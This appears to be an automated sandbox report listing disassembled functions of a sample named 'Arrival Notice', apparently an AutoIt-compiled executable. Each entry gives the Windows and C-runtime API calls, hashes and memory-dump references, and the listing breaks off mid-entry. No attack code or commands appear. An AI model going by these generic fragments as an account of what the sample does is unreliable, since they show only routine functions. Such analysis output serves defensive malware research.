Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8

Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00443CA6
MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
CloseHandle.KERNEL32(00000000), ref: 00443CF9

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9

Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00430BA2
ScreenToClient.USER32(?,?), ref: 00430BC1
ScreenToClient.USER32(?,?), ref: 00430BE2
InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0

Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0043392E

Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50

__wsplitpath.LIBCMT ref: 00433950
__wcsicoll.LIBCMT ref: 00433974
__wcsicoll.LIBCMT ref: 0043398A

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
String ID:
API String ID: 1187119602-0
Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4

Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0043497B
_wcslen.LIBCMT ref: 00434983

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

_wcscpy.LIBCMT ref: 004349AB
_wcscat.LIBCMT ref: 004349B2

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcslen$_malloc_wcscat_wcscpy
String ID:
API String ID: 1597257046-0
Opcode ID: 0b2002a4149e2d8beddbe853b39040ac6e32887258a59906f1cc641053fbe158
Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
Opcode Fuzzy Hash: 0b2002a4149e2d8beddbe853b39040ac6e32887258a59906f1cc641053fbe158
Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764

Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
__malloc_crt.LIBCMT ref: 0041F5B6
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9

Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: DeleteDestroyObject$IconWindow
String ID:
API String ID: 3349847261-0
Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69

Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
InterlockedExchange.KERNEL32(?,?), ref: 0044B603
LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
LeaveCriticalSection.KERNEL32(?), ref: 0044B62C

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5

Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266

MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
LineTo.GDI32(?,?,?), ref: 00447326
EndPath.GDI32(?), ref: 00447336
StrokePath.GDI32(?), ref: 00447344

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
String ID:
API String ID: 2783949968-0
Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9

Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
GetCurrentThreadId.KERNEL32 ref: 004364A3
AttachThreadInput.USER32(00000000), ref: 004364AA

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD

Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B

Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4

Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00472B63
GetDC.USER32(00000000), ref: 00472B6C
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
ReleaseDC.USER32(00000000,?), ref: 00472B99

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54

Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00472BB2
GetDC.USER32(00000000), ref: 00472BBB
GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
ReleaseDC.USER32(00000000,?), ref: 00472BE8

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94

Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00415150

Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E

CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
__freeptd.LIBCMT ref: 0041516B
ExitThread.KERNEL32 ref: 00415173

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
String ID:
API String ID: 1454798553-0
Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC

Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 0042F551

Strings

Q\E, xrefs: 0042F54B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _strncmp
String ID: Q\E
API String ID: 909875538-2189900498
Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89

Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD

Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1

Strings

AutoIt3GUI, xrefs: 00460EA7
Container, xrefs: 00460EAC

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
String ID: AutoIt3GUI$Container
API String ID: 2652923123-3941886329
Opcode ID: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
Opcode Fuzzy Hash: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65

Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044D011
_strncmp.LIBCMT ref: 0044FA43

Strings

U, xrefs: 0044FB88
\, xrefs: 0044D061

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
